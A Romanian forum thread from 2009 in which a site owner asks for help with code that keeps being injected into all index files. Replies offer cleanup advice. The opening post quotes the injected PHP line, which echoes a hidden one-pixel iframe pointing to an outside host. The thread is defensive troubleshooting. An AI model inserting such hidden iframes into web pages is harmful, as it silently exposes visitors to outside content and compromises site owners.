PDA

Arată versiune īntreagă : Iframe

Design
26.01.2009, 08:26
Salut tocmai am descis un site cu hosting la bpalced si domeniu tk
Problema este ca se aduga un cod in toate index.php si index.html dupa acel ftp
"echo "<iframe src=\"http://xxxxxx.xxxx/?click=2473890\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"
Ma puteti ajuta sa scap de acesta eroare pentru ca il detecteaza ca virus dupaia si daca o sterg eu manual degeaba se pune la loc :eek::mad: este vorba de site-ul noupenet

Stresant
26.01.2009, 09:24
Ai access FTP?
.htaccess-ul cum arata ?
Daca poti sterge htaccess , sterge-l , probabil de acolo se apeleaza vreun script cgi care iti plaseaza acele ads-uri in pagina .

Design
26.01.2009, 16:24
O sa sterg htacces dar din cat imi aduc aminte nu este nimic in el oricum site-ul e facut in WP 2.7 si mai am un site gazduit tot la bplaced domeniu tot tk si tot asa face

Webnetinfo
26.01.2009, 16:43
si eu am aceasi problema

Design
26.01.2009, 18:44
:( in primul rand nu e bine ca o ai dar vruiams a te intreb hosting si subodomeniu/domeniu de unde ai?
Si m-am uitat pe ftp nu am nci un htacces dar am un .ftpquota care nu are nimic in el

jarmila33
09.02.2009, 09:18
Nu inteleg

dorikut
24.07.2009, 11:45
In acest sens este indicat sa apelezi la fiecare dintre urmatoarele etape, pe rand, daca problema nu se rezolva prin etapa anterioara:
1.Curata fisierul .htaccess. dosarul cgi-bin si lista cron-job.
2.Verifica fiecare fisier si radiaza/curata fisierele suspecte.
3.Contacteaza administratorul serverului (in special daca acesta ruleaza pe Windows).
4.In mod normal acesta trebuie sa gaseasca o solutie.
5.Solicita o reconsiderare la aceasta (https://www.google.com/webmasters/tools/reconsideration) adresa pentru a evita banarea siteului de catre Google.

Succes! ;)

WraiTh
24.07.2009, 12:05
pune chmod 444 la fisierele care sunt afectate.
cel mai probabil, ai incarcat, tu sau alt user de pe server, un script care era nulled, si care continea acest virus, care acum apare la 70-80% din clientii de pe server.